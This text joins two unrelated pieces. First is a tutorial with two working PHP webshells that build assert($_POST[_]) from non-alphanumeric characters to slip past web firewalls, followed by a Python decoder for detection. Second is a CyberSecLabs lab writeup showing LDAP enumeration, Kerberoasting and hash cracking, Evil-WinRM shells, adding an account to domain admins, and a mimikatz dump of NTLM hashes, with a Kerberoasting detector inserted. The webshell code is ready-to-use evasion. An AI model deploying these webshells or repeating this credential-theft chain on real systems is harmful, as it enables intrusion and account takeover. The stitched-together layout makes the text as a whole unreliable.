bypass-waf-php-webshell-without-numbers-letters

[Bypass WAF] PHP webshell without numbers and letters

To bypass a WAF, you can use a few techniques to rewrite your webshell.

Idea

First, let's be clear about the idea. My core idea is to start from non-alphanumeric characters, transform them in various ways, and in the end construct any letter a-z from them. Then, using PHP's ability to call a function dynamically through a string variable, splice together a function name such as "assert" and execute it dynamically.

So the transformation method is the main problem to solve.

But before that, I need to talk about the difference between PHP 5 and PHP 7.

In PHP 5, assert is a function, so we can use $f='assert';$f(...); to dynamically execute arbitrary code.

In PHP 7, assert is no longer a function but a language construct (similar to eval), so it cannot be called dynamically through a variable function name, and using it becomes a little more complicated. There is no need to worry too much, though: a function such as file_put_contents can be used in the same way to get a shell.

For convenience, PHP 5 is used as the environment here; how to apply this under PHP 7 is left for you to explore.

Method 1

This is the simplest and most obvious method. In PHP, XORing two strings yields another string. So, to get a letter in a-z, we look for two non-alphanumeric characters whose XOR result is that letter.

Get the following results:

<?php
// %XX stands for the raw byte 0xXX: the payload is sent URL-encoded and the server
// decodes it before PHP sees it, so e.g. 0x01 ^ 0x60 ('`') gives 0x61 ('a').
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';
$___=$$__;
$_($___[_]); // assert($_POST[_]);

The results are as follows:

Method 2

This uses a small PHP trick; see the documentation: http://php.net/manual/en/language.operators.increment.php

PHP follows Perl's convention when dealing with arithmetic operations on character variables and not C's. For example, in PHP and Perl $a = 'Z'; $a++; turns $a into 'AA', while in C a = 'Z'; a++; turns a into '[' (ASCII value of 'Z' is 90, ASCII value of '[' is 91). Note that character variables can be incremented but not decremented and even so only plain ASCII alphabets and digits (a-z, A-Z and 0-9) are supported. Incrementing/decrementing other character variables has no effect, the original string is unchanged.

So, how do we get a variable holding the string 'a'?

At first glance, the first letter of the word Array is a capital A and the fourth letter is a lowercase a. In other words, we can get both a lowercase a and a capital A, which means that by incrementing we can reach all the letters a-z and A-Z.

In PHP, if you concatenate an array with a string, the array is converted to a string whose value is Array.

Then take the first character of that string, and you get 'A'.

Using this technique, I wrote the following webshell (because PHP function names are case-insensitive, what we end up executing is ASSERT($_POST[_])):

<?php
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E 
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;
 
$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;
 
$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);

@ is not allowed either, but it is not needed 😉: it only suppresses the notice, and execution proceeds whether @ is set or not.
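To see what a payload like the two above resolves to when it turns up in a request log or an uploaded file, here is an added Python example (not part of the original article) that emulates the two PHP behaviours the methods rely on: string XOR (Method 1) and Perl-style string increment (Method 2). It assumes the %XX sequences in the article are URL-encoded bytes, as they are in transit, and evaluates the concatenation on one line of PHP at a time.

```python
"""Resolve what the two letter-construction tricks above actually build.

Added example, not part of the original article: an analyst or WAF-rule author
who finds a payload like the ones above wants to know which function name it
assembles. This emulates the two PHP behaviours the article relies on.
"""
import re
from urllib.parse import unquote_to_bytes


def php_xor(a: bytes, b: bytes) -> bytes:
    """PHP 'str' ^ 'str': byte-wise XOR, truncated to the shorter operand."""
    return bytes(x ^ y for x, y in zip(a, b))


def php_increment(s: str) -> str:
    """Emulate PHP's ++ on a string (Perl convention): 'A'->'B', 'Z'->'AA', 'Az'->'Ba'.

    Carries propagate right to left through [a-zA-Z0-9]; the first other character
    stops the carry, so '_z' becomes '_a'. Purely numeric strings are turned into
    integers by PHP before incrementing and are not handled here.
    """
    chars = list(s)
    last = None          # class of the leftmost character the carry passed through
    pos = len(chars) - 1
    carry = True
    while pos >= 0 and carry:
        c = chars[pos]
        if "a" <= c <= "z":
            last, carry, chars[pos] = "a", c == "z", ("a" if c == "z" else chr(ord(c) + 1))
        elif "A" <= c <= "Z":
            last, carry, chars[pos] = "A", c == "Z", ("A" if c == "Z" else chr(ord(c) + 1))
        elif "0" <= c <= "9":
            last, carry, chars[pos] = "0", c == "9", ("0" if c == "9" else chr(ord(c) + 1))
        else:
            carry = False  # non-alphanumeric: PHP leaves it alone and stops
        pos -= 1
    if carry and last is not None:
        chars.insert(0, {"a": "a", "A": "A", "0": "1"}[last])
    return "".join(chars)


def php_increment_n(s: str, n: int) -> str:
    """Apply ++ n times, as the chains of $__++ in Method 2 do."""
    for _ in range(n):
        s = php_increment(s)
    return s


# One concatenation term: either ('left'^'right') or a plain 'literal'.
_TERM = re.compile(r"\('([^']*)'\^'([^']*)'\)|'([^']*)'")


def decode_concat(php_line: str) -> str:
    """Evaluate the string built on one line such as $_=('%01'^'`').('%13'^'`');

    %XX escapes are URL-decoded first, as the web server does before PHP sees the
    request body. Anything after a // comment is ignored.
    """
    expr = php_line.split("//", 1)[0]
    out = b""
    for left, right, lit in _TERM.findall(expr):
        if lit:
            out += unquote_to_bytes(lit)
        else:
            out += php_xor(unquote_to_bytes(left), unquote_to_bytes(right))
    return out.decode("latin-1")


if __name__ == "__main__":
    # The two lines from Method 1 above, and the 18-step increment from Method 2.
    print(decode_concat("$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');"))
    print(decode_concat("$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');"))
    print(php_increment_n("A", 18))
```

Feeding the two Method 1 lines through decode_concat yields assert and _POST, and php_increment_n("A", 18) yields S, which is why a detection rule that only matches the literal word assert never sees this payload; the rule has to match the construction (XOR of quoted strings, long runs of ++ on a variable, $$ variable-variables) or the decoded result.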


csl-roast-nl

CyberSecLabs – Roast writeup

https://www.cyberseclabs.co.uk/labs/challenge-labs/all

As always we start with an nmap scan.

kali@kali:/opt/evil-winrm$ nmap -Pn -vv -A 172.31.3.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 08:06 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 08:06
Completed Parallel DNS resolution of 1 host. at 08:06, 0.00s elapsed
Initiating Connect Scan at 08:06
Scanning 172.31.3.2 [1000 ports]
Discovered open port 53/tcp on 172.31.3.2
Discovered open port 139/tcp on 172.31.3.2
Discovered open port 445/tcp on 172.31.3.2
Discovered open port 135/tcp on 172.31.3.2
Discovered open port 3389/tcp on 172.31.3.2
Discovered open port 636/tcp on 172.31.3.2
Discovered open port 3269/tcp on 172.31.3.2
Discovered open port 593/tcp on 172.31.3.2
Discovered open port 3268/tcp on 172.31.3.2
Discovered open port 464/tcp on 172.31.3.2
Discovered open port 88/tcp on 172.31.3.2
Discovered open port 389/tcp on 172.31.3.2
Completed Connect Scan at 08:06, 6.49s elapsed (1000 total ports)
Initiating Service scan at 08:06
kali@kali:/opt$ nmap -Pn -sV --script "ldap* and not brute*" -p 389 172.31.3.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-17 08:51 EDT
Nmap scan report for 172.31.3.2
Host is up (0.10s latency).

PORT STATE SERVICE VERSION
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: roast.csl, Site: Default-First-Site-Name)
| ldap-brute:
| root:<empty> => Valid credentials
| admin:<empty> => Valid credentials
| administrator:<empty> => Valid credentials
| webadmin:<empty> => Valid credentials
| sysadmin:<empty> => Valid credentials
| netadmin:<empty> => Valid credentials
| guest:<empty> => Valid credentials
| user:<empty> => Valid credentials
| web:<empty> => Valid credentials
|_ test:<empty> => Valid credentials
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=roast,DC=csl
| ldapServiceName: roast.csl:roast$@ROAST.CSL
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=roast,DC=csl
| serverName: CN=ROAST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=roast,DC=csl
| schemaNamingContext: CN=Schema,CN=Configuration,DC=roast,DC=csl
| namingContexts: DC=roast,DC=csl
| namingContexts: CN=Configuration,DC=roast,DC=csl
| namingContexts: CN=Schema,CN=Configuration,DC=roast,DC=csl
| namingContexts: DC=DomainDnsZones,DC=roast,DC=csl
| namingContexts: DC=ForestDnsZones,DC=roast,DC=csl
| isSynchronized: TRUE
| highestCommittedUSN: 86066
| dsServiceName: CN=NTDS Settings,CN=ROAST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=roast,DC=csl
| dnsHostName: Roast.roast.csl
| defaultNamingContext: DC=roast,DC=csl
| currentTime: 20200817125113.0Z
|_ configurationNamingContext: CN=Configuration,DC=roast,DC=csl
| ldap-search:
| Context: DC=roast,DC=csl
| dn: DC=roast,DC=csl
| dn: CN=David Smith,OU=Roast,DC=roast,DC=csl
| objectClass: top
| objectClass: person
| objectClass: organizationalPerson
| objectClass: user
| cn: David Smith
| sn: Smith
| description: Your Password is WelcomeToR04st
| givenName: David
| distinguishedName: CN=David Smith,OU=Roast,DC=roast,DC=csl
| instanceType: 4
| whenCreated: 2020/05/15 06:30:43 UTC
| whenChanged: 2020/05/15 21:42:47 UTC
| displayName: David Smith
| uSNCreated: 16572
| uSNChanged: 32799
| name: David Smith
| objectGUID: 95a9772-f36-7344-9cc1-53d257cf635e
| userAccountControl: 66048
| badPwdCount: 0
| codePage: 0
| countryCode: 0
| badPasswordTime: 2020-05-16T01:47:26+00:00
| lastLogoff: 0
| lastLogon: 2020-05-18T02:48:58+00:00
| logonHours: \xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF
| pwdLastSet: 2020-05-16T01:46:13+00:00
| primaryGroupID: 513
| objectSid: 1-5-21-4133422454-1522376082-951199702-1103
| accountExpires: Never
| logonCount: 1
| sAMAccountName: dsmith
| sAMAccountType: 805306368
| userPrincipalName: dsmith@roast.csl
| objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=roast,DC=csl
| dSCorePropagationData: 2020/05/15 06:46:18 UTC
| dSCorePropagationData: 2020/05/15 06:38:02 UTC
| dSCorePropagationData: 1601/01/01 00:00:00 UTC
| lastLogonTimestamp: 2020-05-16T01:48:13+00:00
| dn: CN=Cody Rhodes,OU=Roast,DC=roast,DC=csl
| objectClass: top
| objectClass: person
| objectClass: organizationalPerson
| objectClass: user
| cn: Cody Rhodes
| sn: Rhodes
| givenName: Cody
| distinguishedName: CN=Cody Rhodes,OU=Roast,DC=roast,DC=csl
| instanceType: 4
| whenCreated: 2020/05/15 06:34:11 UTC
| whenChanged: 2020/05/15 21:41:51 UTC
| displayName: Cody Rhodes
| uSNCreated: 16605
| memberOf: CN=Remote Management Users,CN=Builtin,DC=roast,DC=csl
| uSNChanged: 32794
| name: Cody Rhodes
| objectGUID: 264ab96b-32e6-7f47-9f71-45b9eae6ee8
| userAccountControl: 66048
| badPwdCount: 0
| codePage: 0
| countryCode: 0
| badPasswordTime: 2020-05-16T01:47:26+00:00
| lastLogoff: 0
| lastLogon: 2020-05-16T01:58:03+00:00
| logonHours: \xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF
| pwdLastSet: 2020-05-16T01:47:17+00:00
| primaryGroupID: 513
| objectSid: 1-5-21-4133422454-1522376082-951199702-1104
| accountExpires: Never
| logonCount: 2
| sAMAccountName: crhodes
| sAMAccountType: 805306368
| userPrincipalName: crhodes@roast.csl
| objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=roast,DC=csl
| dSCorePropagationData: 2020/05/15 06:46:18 UTC
| dSCorePropagationData: 2020/05/15 06:37:46 UTC
| dSCorePropagationData: 1601/01/01 00:00:00 UTC
| lastLogonTimestamp: 2020-05-15T10:54:23+00:00
| dn: CN=Steve Smith,OU=Roast,DC=roast,DC=csl
| objectClass: top
| objectClass: person
| objectClass: organizationalPerson
| objectClass: user
| cn: Steve Smith
| sn: Smith
| givenName: Steve
| distinguishedName: CN=Steve Smith,OU=Roast,DC=roast,DC=csl
| instanceType: 4
| whenCreated: 2020/05/15 06:35:06 UTC
| whenChanged: 2020/05/15 06:38:17 UTC
| displayName: Steve Smith
| uSNCreated: 16612
| uSNChanged: 16629
| name: Steve Smith
| objectGUID: 66dc74ae-c214-4e42-94e3-44092523e22
| userAccountControl: 66048
| badPwdCount: 2
| codePage: 0
| countryCode: 0
| badPasswordTime: 2020-05-16T01:47:26+00:00
| lastLogoff: 0
| lastLogon: Never
| pwdLastSet: 2020-05-15T10:40:32+00:00
| primaryGroupID: 513
| objectSid: 1-5-21-4133422454-1522376082-951199702-1105
| accountExpires: 30828-09-14T06:53:31+00:00
| logonCount: 0
| sAMAccountName: ssmith
| sAMAccountType: 805306368
| userPrincipalName: ssmith@roast.csl
| objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=roast,DC=csl
| dSCorePropagationData: 2020/05/15 06:46:18 UTC
| dSCorePropagationData: 2020/05/15 06:38:17 UTC
| dSCorePropagationData: 1601/01/01 00:00:00 UTC
|_ dn: CN=Roast Svc,OU=Roast,DC=roast,DC=csl
Service Info: Host: ROAST; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.48 seconds
kali@kali:/opt$

We make sure we have the latest impacket installed

kali@kali:/opt$ sudo git-clone https://github.com/SecureAuthCorp/impacket.git
sudo: git-clone: command not found
kali@kali:/opt$ sudo git clone https://github.com/SecureAuthCorp/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 18128, done.
remote: Total 18128 (delta 0), reused 0 (delta 0), pack-reused 18128
Receiving objects: 100% (18128/18128), 5.97 MiB | 4.64 MiB/s, done.
Resolving deltas: 100% (13833/13833), done.
kali@kali:/opt$ cd impacket/
kali@kali:/opt/impacket$ pip3 install .


kali@kali:/opt/impacket$ crackmapexec smb 172.31.3.2 -u dsmith -p WelcomeToR04st
SMB 172.31.3.2 445 ROAST [*] Windows 10.0 Build 17763 (name:ROAST) (domain:roast.csl) (signing:True) (SMBv1:False)
SMB 172.31.3.2 445 ROAST [+] roast.csl\dsmith:WelcomeToR04st
kali@kali:/opt/evil-winrm$ crackmapexec smb 172.31.3.2 -u dsmith -p WelcomeToR04st --shares
SMB 172.31.3.2 445 ROAST [*] Windows 10.0 Build 17763 (name:ROAST) (domain:roast.csl) (signing:True) (SMBv1:False)
SMB 172.31.3.2 445 ROAST [+] roast.csl\dsmith:WelcomeToR04st
SMB 172.31.3.2 445 ROAST [+] Enumerated shares
SMB 172.31.3.2 445 ROAST Share Permissions Remark
SMB 172.31.3.2 445 ROAST ----- ----------- ------
SMB 172.31.3.2 445 ROAST ADMIN$ Remote Admin
SMB 172.31.3.2 445 ROAST C$ Default share
SMB 172.31.3.2 445 ROAST IPC$ READ Remote IPC
SMB 172.31.3.2 445 ROAST NETLOGON READ Logon server share
SMB 172.31.3.2 445 ROAST SYSVOL READ Logon server share
kali@kali:/opt/evil-winrm$
kali@kali:/opt/impacket$ crackmapexec winrm 172.31.3.2 -u dsmith -p WelcomeToR04st
WINRM 172.31.3.2 5985 ROAST [*] http://172.31.3.2:5985/wsman
WINRM 172.31.3.2 5985 ROAST [-] ROAST0\dsmith:WelcomeToR04st "Failed to authenticate the user dsmith with ntlm"
kali@kali:/tmp$ GetUserSPNs.py -request -dc-ip 172.31.3.2 roast.csl/crhodes -outputfile hashes.kerberoast
Impacket v0.9.22.dev1+20200813.221956.1c893884 - Copyright 2020 SecureAuth Corporation

Password:WelcomeToR04st
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- -------- ----------------------------------------------------- -------------------------- --------- ----------
roast/ROAST roastsvc CN=Remote Management Users,CN=Builtin,DC=roast,DC=csl 2020-05-15 02:35:50.302845 <never>
kali@kali:/tmp$ cat hashes.kerberoast
$krb5tgs$23$*roastsvc$ROAST.CSL$roast/ROAST*$a06f00e18dbcc60631026290cd49c8c8$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
kali@kali:/tmp$
kali@kali:/tmp$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!!!watermelon245 (?)
1g 0:00:00:25 DONE (2020-08-18 05:25) 0.03957g/s 567616p/s 567616c/s 567616C/s !!12Honey.. 0860776252
Use the "--show" option to display all of the cracked passwords reliably
Session completed
kali@kali:/tmp$
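The GetUserSPNs.py request above asks the KDC for an RC4-HMAC service ticket (etype 23, as john reports) for every account that has an SPN, and each such request is logged on the domain controller as Security event 4769 with TicketEncryptionType 0x17. The following added Python example (not from the writeup) shows the detection logic run over constructed 4769 records: the account and service names come from the writeup, the timestamps, client addresses and the extra service accounts are made up for the example.

```python
"""Kerberoasting detection over Windows Security event 4769 records.

Added example, not from the writeup. Field names follow the 4769 event
(Account Name, Service Name, Ticket Encryption Type, Status); the records
below are constructed for this example.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17   # TicketEncryptionType of an RC4-HMAC service ticket (etype 23)
AES256 = 0x12     # AES256-CTS-HMAC-SHA1-96, the normal case on a current domain
SUCCESS = 0x0     # Status: the ticket was issued

SAMPLE_4769 = [  # constructed sample events
    {"time": "2020-08-18T09:24:01", "account": "crhodes@ROAST.CSL", "service": "roastsvc",
     "etype": RC4_HMAC, "status": SUCCESS, "client": "10.0.0.50"},
    {"time": "2020-08-18T09:24:02", "account": "crhodes@ROAST.CSL", "service": "krbtgt",
     "etype": AES256, "status": SUCCESS, "client": "10.0.0.50"},          # TGT traffic, benign
    {"time": "2020-08-18T09:30:11", "account": "ROAST$@ROAST.CSL", "service": "ROAST$",
     "etype": AES256, "status": SUCCESS, "client": "172.31.3.2"},          # machine account, benign
    {"time": "2020-08-18T10:02:40", "account": "dsmith@ROAST.CSL", "service": "sqlsvc",
     "etype": RC4_HMAC, "status": SUCCESS, "client": "10.0.0.51"},
    {"time": "2020-08-18T10:02:41", "account": "dsmith@ROAST.CSL", "service": "websvc",
     "etype": RC4_HMAC, "status": SUCCESS, "client": "10.0.0.51"},
    {"time": "2020-08-18T10:02:41", "account": "dsmith@ROAST.CSL", "service": "backupsvc",
     "etype": RC4_HMAC, "status": 0x12, "client": "10.0.0.51"},            # rejected, not counted
]


def is_roast_request(ev):
    """An issued RC4 service ticket for a user (non-machine, non-krbtgt) service account."""
    svc = ev["service"]
    return (ev["etype"] == RC4_HMAC and ev["status"] == SUCCESS
            and not svc.endswith("$") and svc.lower() != "krbtgt")


def detect_kerberoast(events, window=timedelta(minutes=10), min_services=2):
    """Map each requesting account to the distinct service accounts it obtained
    RC4 tickets for inside one sliding `window`, keeping accounts that reach
    `min_services`. The first window that crosses the threshold is reported."""
    by_account = defaultdict(list)
    for ev in events:
        if is_roast_request(ev):
            by_account[ev["account"]].append((datetime.fromisoformat(ev["time"]), ev["service"]))
    flagged = {}
    for account, reqs in by_account.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            services = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(services) >= min_services:
                flagged[account] = sorted(services)
                break
    return flagged


if __name__ == "__main__":
    for account, services in detect_kerberoast(SAMPLE_4769).items():
        print(f"{account}: RC4 tickets for {', '.join(services)}")
```

With the default threshold of two distinct services the constructed dsmith burst is reported and the single roastsvc request is not; on a domain where service accounts hold AES keys, any 0x17 service ticket for a user account is itself the anomaly, and min_services=1 catches exactly the one-SPN request seen in this lab. Event 4769 is only written when the "Audit Kerberos Service Ticket Operations" subcategory is enabled on the domain controllers.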
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u roastsvc -p '!!!watermelon245'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\roastsvc\Documents>
kali@kali:/opt/evil-winrm$ crackmapexec winrm 172.31.3.2 -u crhodes -p WelcomeToR04st
WINRM 172.31.3.2 5985 ROAST [*] http://172.31.3.2:5985/wsman
WINRM 172.31.3.2 5985 ROAST [+] ROAST0\crhodes:WelcomeToR04st (Pwn3d!)
kali@kali:/opt/evil-winrm$
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u crhodes -p 'WelcomeToR04st'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\crhodes\Documents> cd c:\puck

*Evil-WinRM* PS C:\puck> upload /opt/Bloodhound/Ingestors/Sharphound.exe
Info: Uploading /opt/Bloodhound/Ingestors/Sharphound.exe to C:\puck\Sharphound.exe


Data: 1110016 bytes of 1110016 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\puck> upload /opt/Bloodhound/Ingestors/Sharphound.ps1
Info: Uploading /opt/Bloodhound/Ingestors/Sharphound.ps1 to C:\puck\Sharphound.ps1


Data: 1297764 bytes of 1297764 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\puck> dir


Directory: C:\puck


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/18/2020 3:42 AM 832512 Sharphound.exe
-a---- 8/18/2020 3:42 AM 973323 Sharphound.ps1


*Evil-WinRM* PS C:\puck> ./Sharphound.exe
-----------------------------------------------
Initializing SharpHound at 3:42 AM on 8/18/2020
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain ROAST.CSL using path CN=Schema,CN=Configuration,DC=ROAST,DC=CSL
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 61 objects finished (+61 61)/s -- Using 26 MB RAM
Enumeration finished in 00:00:01.8335102
Compressing data to .\20200818034254_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 3:42 AM on 8/18/2020! Happy Graphing!

*Evil-WinRM* PS C:\puck> dir


Directory: C:\puck


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/18/2020 3:42 AM 8935 20200818034254_BloodHound.zip
-a---- 8/18/2020 3:42 AM 832512 Sharphound.exe
-a---- 8/18/2020 3:42 AM 973323 Sharphound.ps1
-a---- 8/18/2020 3:42 AM 10118 ZDU2MDE4M2MtOTJlZC00MTRlLWFhMmEtOGJlM2E2ODA4ZjUy.bin
*Evil-WinRM* PS C:\puck>
*Evil-WinRM* PS C:\puck> download 20200819234325_BloodHound.zip /tmp/20200819234325_BloodHound.zip
Info: Downloading C:\puck\20200819234325_BloodHound.zip to /tmp/20200819234325_BloodHound.zip

Info: Download successful!
*Evil-WinRM* PS C:\puck>

 

net group "domain admins" roastsvc /add

*Evil-WinRM* PS C:\users\roastsvc\Documents> ./mimikatz.exe "privilege:debug" "lsadump::lsa /patch" "exit"

.#####. mimikatz 2.2.0 (x64) #18362 May 2 2020 16:23:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz(commandline) # privilege:debug
ERROR mimikatz_doLocal ; "privilege:debug" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # lsadump::lsa /patch
Domain : ROAST0 / S-1-5-21-4133422454-1522376082-951199702

RID : 000001f4 (500)
User : Administrator
LM :
NTLM : f6861a8cfc1c3b9f3ff39a8adb6bd388

RID : 000001f5 (501)
User : Guest
LM :
NTLM :

RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : 016e928748d559770ee5fe3028baf718

RID : 0000044f (1103)
User : dsmith
LM :
NTLM : a0a8160111b21d48d2e816f4cc8da053

RID : 00000450 (1104)
User : crhodes
LM :
NTLM : a0a8160111b21d48d2e816f4cc8da053

RID : 00000451 (1105)
User : ssmith
LM :
NTLM : 23991f3cd665b0bc1f7cccfd62506161

RID : 00000452 (1106)
User : roastsvc
LM :
